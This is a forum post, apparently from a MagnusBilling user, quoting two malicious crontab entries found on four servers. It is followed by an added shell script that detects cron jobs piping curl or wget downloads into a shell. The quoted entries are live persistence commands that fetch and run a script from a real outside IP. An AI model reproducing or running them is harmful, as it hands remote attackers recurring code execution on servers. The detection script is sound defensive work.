magnusbilling7
Some unusual activity in cronjob of magnus
Today I found this code in the crontab of all four of my different Magnus installations, located on different VPSes and even different vendors, with different domains. Can anyone guess how this is possible, so we can save ourselves for future security?
@reboot /bin/sh -c "if ! pgrep -f '^mbilling --config=mbilling.conf$' &>/dev/null;then pkill -9 -f '^mysqld mysql.cnf$' >/dev/null 2>&1;(curl -sk 'http://157.230.106.100/mobile/linux.php?ac=mbilling&app=MBILL&fn=mbilling&port=80&&rdir=/var/www/html/mbilling/assets&sdir=[RND]&dlt=&ctb=1&prt=1&pck=1&pkl=0&enc=0&tar=1&aes=1&csh=mysqld&cfn=mysql.cnf'||wget -qO- 'http://157.230.106.100/mobile/linux.php?ac=mbilling&app=MBILL&fn=mbilling&port=80&&rdir=/var/www/html/mbilling/assets&sdir=[RND]&dlt=&ctb=1&prt=1&pck=1&pkl=0&enc=0&tar=1&aes=1&csh=mysqld&cfn=mysql.cnf')|(bash||sh);fi"
*/3 * * * * /bin/sh -c "if ! pgrep -f '^mbilling --config=mbilling.conf$' &>/dev/null;then pkill -9 -f '^mysqld mysql.cnf$' >/dev/null 2>&1;(curl -sk 'http://157.230.106.100/mobile/linux.php?ac=mbilling&app=MBILL&fn=mbilling&port=80&&rdir=/var/www/html/mbilling/assets&sdir=[RND]&dlt=&ctb=1&prt=1&pck=1&pkl=0&enc=0&tar=1&aes=1&csh=mysqld&cfn=mysql.cnf'||wget -qO- 'http://157.230.106.100/mobile/linux.php?ac=mbilling&app=MBILL&fn=mbilling&port=80&&rdir=/var/www/html/mbilling/assets&sdir=[RND]&dlt=&ctb=1&prt=1&pck=1&pkl=0&enc=0&tar=1&aes=1&csh=mysqld&cfn=mysql.cnf')|(bash||sh);fi"
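A defensive check for the pattern in the two entries above (an `@reboot` and a `*/3` job that download a script with curl or wget and pipe it into a shell), added here as an example that is not part of the original post. The function names and the sample crontab are constructed for illustration, and 192.0.2.10 is a documentation address standing in for the real host.

```sh
#!/bin/sh
# Added example (not from the original post): flag cron entries that fetch a
# remote script with curl/wget and pipe it straight into a shell.

# curl or wget followed by an http(s) URL before any pipe character.
FETCH_RE='(curl|wget)[^|]*https?://'
# A pipe into sh/bash/dash/zsh/ksh, optionally inside a "(" subshell.
PIPE_SH_RE='\|[[:space:]]*\(?[[:space:]]*(ba|da|z|k)?sh([^[:alnum:]_.-]|$)'

# Read crontab text on stdin, print only the suspicious entries.
# Comment and blank lines are skipped; always returns 0.
suspicious_cron_lines() {
    grep -Ev '^[[:space:]]*(#|$)' \
        | grep -E "$FETCH_RE" \
        | grep -E "$PIPE_SH_RE" || true
}

# Print the unique hosts those entries download from, for egress blocking
# and for searching proxy or firewall logs.
fetch_hosts() {
    suspicious_cron_lines \
        | grep -oE "https?://[^/'\" ]+" \
        | sed -E 's#^https?://##' \
        | sort -u
}

# Constructed sample crontab, modelled on the entries in the post.
sample_crontab() {
    cat <<'EOF'
# nightly backup
0 2 * * * /usr/local/bin/backup.sh | logger -t backup
*/10 * * * * curl -fsS https://status.example.invalid/ping >/dev/null
@reboot /bin/sh -c "(curl -sk 'http://192.0.2.10/mobile/linux.php?ac=x'||wget -qO- 'http://192.0.2.10/mobile/linux.php?ac=x')|(bash||sh)"
*/3 * * * * /bin/sh -c "(curl -sk 'http://192.0.2.10/mobile/linux.php?ac=x'||wget -qO- 'http://192.0.2.10/mobile/linux.php?ac=x')|(bash||sh)"
EOF
}

# Demo run on the sample: prints the two flagged entries, then the host.
sample_crontab | suspicious_cron_lines
sample_crontab | fetch_hosts
```

On a real host, pipe `crontab -l -u <user>` for each account and the contents of `/etc/crontab` and `/etc/cron.d/` into `suspicious_cron_lines`, including the account the web server runs as.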